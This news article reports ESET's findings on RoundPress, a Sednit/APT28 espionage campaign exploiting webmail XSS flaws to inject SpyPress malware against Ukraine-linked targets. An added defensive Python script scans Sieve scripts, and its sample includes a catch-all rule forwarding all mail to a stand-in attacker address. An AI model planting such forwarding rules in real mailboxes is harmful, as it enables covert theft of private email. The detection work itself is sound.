ESET reports on RoundPress, a cyber espionage campaign by Russia’s Fancy Bear (Sednit) targeting Ukraine-related organizations via webmail vulnerabilities and SpyPress malware.
Cybersecurity researchers at ESET have revealed a sophisticated cyber espionage campaign, codenamed RoundPress, assessing with “medium confidence” that it is orchestrated by the Russian-backed Sednit group (aka APT28, Fancy Bear). This operation is actively targeting organizations linked to the ongoing conflict in Ukraine, aiming to exfiltrate confidential information from vulnerable webmail servers such as Roundcube.
The Sednit group, linked by the US Department of Justice to the 2016 Democratic National Committee (DNC) hack and tracked by Hackread.com in attacks on TV5Monde and WADA, has been employing targeted spearphishing emails in the RoundPress campaign.
These emails exploit Cross-Site Scripting (XSS) vulnerabilities in various webmail platforms to inject malicious JavaScript code, dubbed SpyPress, into the victim’s browser.
Exploiting Known and Zero-Day Vulnerabilities in Webmail Systems
In ESET’s blog post, shared with Hackread.com, researchers noted that over the past two years espionage groups have targeted webmail servers such as Roundcube and Zimbra for email theft: such servers are often outdated, and their vulnerabilities can be triggered remotely (for instance, by a victim merely viewing a crafted email), which makes them easy targets.
In 2023, researchers observed Sednit exploiting CVE-2020-35730 in Roundcube. However, in 2024, the campaign expanded to target vulnerabilities in:
- Horde (an older XSS flaw)
- Roundcube (CVE-2023-43770, patched on September 14, 2023)
- Zimbra (CVE-2024-27443, also known as ZBUG-3730, patched on March 1, 2024)
- MDaemon (CVE-2024-11182, a zero-day reported by researchers on November 1, 2024, and patched in version 24.5.1 on November 14, 2024)

ESET noted a specific spearphishing email sent on September 29, 2023, from katecohen1984@portugalmail.pt exploiting CVE-2023-43770 in Roundcube. The emails often mimic news content to entice victims to open them, such as an email to a Ukrainian target on September 11, 2024, from kyivinfo24@ukr.net about an alleged arrest in Kharkiv, and another to a Bulgarian target on November 8, 2024, from office@terembg.com regarding Putin and Trump.
Primary Focus on Ukraine-Related Entities
The primary targets of Operation RoundPress in 2024, as identified through ESET telemetry and VirusTotal submissions, are predominantly Ukrainian governmental entities and defence companies in Bulgaria and Romania, some of which are producing Soviet-era weapons for Ukraine.
Researchers also observed targeting of national governments in Greece, Cameroon, Ecuador, Serbia, and Cyprus (an academic in environmental studies), a telecommunications company serving the defence sector in Bulgaria, and a civil air carrier company and a state transport company in Ukraine.
The SpyPress malware variants (SpyPress.HORDE, SpyPress.MDAEMON, SpyPress.ROUNDCUBE, and SpyPress.ZIMBRA) share obfuscation techniques and communicate with C2 servers via HTTP POST requests. However, their capabilities vary.
For instance, SpyPress.ROUNDCUBE has been observed creating Sieve rules to forward all incoming emails to an attacker-controlled address, such as srezoska@skiff.com (Skiff being a privacy-oriented email service). SpyPress.MDAEMON demonstrated the ability to create App Passwords, granting persistent access.
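Because the Sieve forwarding rule is what turns a one-off XSS into ongoing mailbox exfiltration, a defender's quickest win is to audit users' Sieve scripts for redirects to external domains. The following is an added example (not ESET's or Roundcube's code): it scans a Sieve script for `redirect` actions whose destination domain is not in an allow-list and flags the unconditional "forward everything" pattern; the sample script and all addresses and domains in it are constructed for illustration.

```python
"""Audit Sieve scripts for mail-forwarding rules to external addresses."""
import re
from typing import List, Tuple

# Constructed sample Sieve script: one legitimate rule plus an injected
# catch-all forward of the kind described above (addresses are illustrative).
SAMPLE_SIEVE = r'''
# rule:[Vacation]
if header :contains "subject" "out of office" {
    redirect "colleague@example.org";
}
# rule:[Forward]
if true {
    redirect :copy "attacker-mailbox@external.example";
    keep;
}
'''

# Matches `redirect "addr"` with optional tagged arguments such as :copy.
REDIRECT_RE = re.compile(r'\bredirect\b(?:\s+:\w+)*\s+"([^"]+)"')


def find_external_redirects(sieve_text: str, internal_domains: List[str]) -> List[Tuple[int, str]]:
    """Return (line_number, address) for each redirect to a non-internal domain.

    Hash comments are stripped first so commented-out rules are not reported.
    (A '#' inside a quoted string would also be treated as a comment start;
    acceptable for an audit heuristic, noted here as a limitation.)
    """
    internal = {d.lower() for d in internal_domains}
    findings = []
    for lineno, line in enumerate(sieve_text.splitlines(), start=1):
        code = line.split("#", 1)[0]
        for match in REDIRECT_RE.finditer(code):
            addr = match.group(1).strip().lower()
            domain = addr.rsplit("@", 1)[-1] if "@" in addr else ""
            if domain not in internal:          # unknown or missing domain is suspicious
                findings.append((lineno, addr))
    return findings


def is_catch_all_forward(sieve_text: str) -> bool:
    """True if any rule redirects unconditionally (`if true { ... redirect ... }`),
    the shape that exfiltrates every incoming message."""
    return re.search(r'\bif\s+true\s*\{[^}]*\bredirect\b', sieve_text, re.S) is not None


if __name__ == "__main__":
    for lineno, addr in find_external_redirects(SAMPLE_SIEVE, ["example.org"]):
        print(f"line {lineno}: external redirect to {addr}")
    print("catch-all forward present:", is_catch_all_forward(SAMPLE_SIEVE))
```

On a Dovecot host the same functions can be run over each user's active script (the file the `sieve` setting points at, by default under the mail home); any external redirect or catch-all rule the user did not create is an incident, not a misconfiguration.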
Researchers concluded that the ongoing exploitation of webmail vulnerabilities by groups like Sednit underscores the importance of timely patching and strong security measures to protect sensitive information from such targeted spying campaigns.
J Stephen Kowski, Field CTO at SlashNext Email Security+, commented on the latest development, stating, “Attacks like Operation RoundPress show how quickly hackers can shift targets, especially when they find weaknesses in popular email platforms.”
“Whether you’re using paid commercial email systems or free, self-hosted open-source options like RoundCube, no solution is completely safe – self-hosted systems often give a false sense of security since they still need regular updates and professional maintenance,” he warned.
“The best way to stay ahead is by making sure email systems are always updated and patched, using strong protections like multi-factor authentication, and having tools that can detect and block phishing emails before they reach users,” Kowski advised.